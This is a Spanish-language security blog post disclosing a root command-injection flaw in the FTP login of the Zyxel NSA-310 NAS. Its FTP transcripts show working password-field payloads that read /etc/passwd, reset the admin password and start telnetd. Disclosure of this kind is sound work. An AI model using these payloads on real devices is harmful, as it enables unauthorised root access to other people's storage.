Vulnerabilidad en Zyxel Mediaserver/NAS NSA-310

Recientemente se ha reportado una vulnerabilidad grave en el Mediaserver/NAS modelo ZyXEL NSA-310 que podría permitir a un atacante remoto ejecutar código arbitrariamente como root. 
 
Ya se conocía la de existencia de un backdoor en el último firmware V4.70(AFK.1), pero es que además es posible usar una comilla simple "'" para introducir comandos de sistema.
 
Veamos unos ejemplos:
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 09:00. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';cat /etc/passwd;
root:x:0:0:root:/root:/bin/sh
De forma sencilla un atacante podría usar el servidor FTP para mostrar el contenido del fichero passwd.

Además es posible cambiar la contraseña del admin sin conocer la anterior llamando al script del sistema /sbin/account.sh:
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220 ­You are user number 1 of 10 allowed.
220 ­Local time is now 09:00. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';/sbin/account.sh;

Una vez hecho ésto la contraseña se habrá restablecido a la de por defecto, es decir, admin / 1234.

Por último, podemos también arrancar un demonio telnetd al que acceder como:

admin / changed_pw
 root / changed_pw
 
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 09:00. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';telnetd;
Zyxel se niega a solucionar la vulnerabilidad porque hace dos años que se llegó su ciclo final de soporte conocido como EoL End of life, sin embargo el dispositivo sigue a la venta en Amazon...

Compartir este artículo

La empresa

ProtecLine está compuesta por un grupo de expertos en Seguridad Informática, especializados en auditorías de seguridad IT (Hacking Ético). El servicio de Análisis de vulnerabilidades Online Vulnera.Me © es propiedad de ProtecLine, S.L.